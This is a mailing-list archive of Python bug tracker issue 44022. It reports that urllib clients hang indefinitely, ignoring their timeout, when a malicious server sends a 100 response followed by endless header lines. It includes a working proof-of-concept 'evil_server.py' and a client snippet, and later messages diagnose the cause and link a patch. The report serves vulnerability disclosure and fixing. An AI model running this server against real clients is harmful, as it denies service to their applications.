[issue44022] "urllib" will result to deny of service

2021-05-05 Thread Gen Xu 


Gen Xu  added the comment:

Looks like it is caused by the httplib not limiting total header size after 
receiving 100. Added a counter for that to be same size as _MAXLINE=65536.

--
versions:  -Python 3.7

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue44022] "urllib" will result to deny of service

2021-05-05 Thread Gen Xu 


Gen Xu  added the comment:

Added a possible PR. Review will be appreicated.

--

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue44022] "urllib" will result to deny of service

2021-05-05 Thread Gen Xu 


Change by Gen Xu :


--
keywords: +patch
nosy: +gen-xu
nosy_count: 1.0 -> 2.0
pull_requests: +24585
stage:  -> patch review
pull_request: https://github.com/python/cpython/pull/25916

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue44022] "urllib" will result to deny of service

2021-05-03 Thread guangli dong 


New submission from guangli dong :

if a client request a http/https/ftp service which is controlled by attacker, 
attacker can make this client hang forever, event client has set "timeout" 
argument.

maybe this client also will consume more and more memory. i does not test on 
this conclusion.

client.py
```
import urllib.request

req = urllib.request.Request('http://127.0.0.1:8085')
response = urllib.request.urlopen(req, timeout=1)
```

evil_server.py
```
# coding:utf-8
from socket import *
from multiprocessing import *
from time import sleep

def dealWithClient(newSocket,destAddr):
recvData = newSocket.recv(1024)
newSocket.send(b"""HTTP/1.1 100 OK\n""")

while True:
# recvData = newSocket.recv(1024)
newSocket.send(b"""x:a\n""")

if len(recvData)>0:
# print('recv[%s]:%s'%(str(destAddr), recvData))
pass
else:
print('[%s]close'%str(destAddr))
sleep(10)
print('over')
break

# newSocket.close()


def main():

serSocket = socket(AF_INET, SOCK_STREAM)
serSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR  , 1)
localAddr = ('', 8085)
serSocket.bind(localAddr)
serSocket.listen(5)

try:
while True:
newSocket,destAddr = serSocket.accept()

client = Process(target=dealWithClient, args=(newSocket,destAddr))
client.start()

newSocket.close()
finally:
serSocket.close()

if __name__ == '__main__':
main()
```

--
components: Library (Lib)
messages: 392825
nosy: leveryd
priority: normal
severity: normal
status: open
title: "urllib" will result to deny of service
type: security
versions: Python 3.7

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com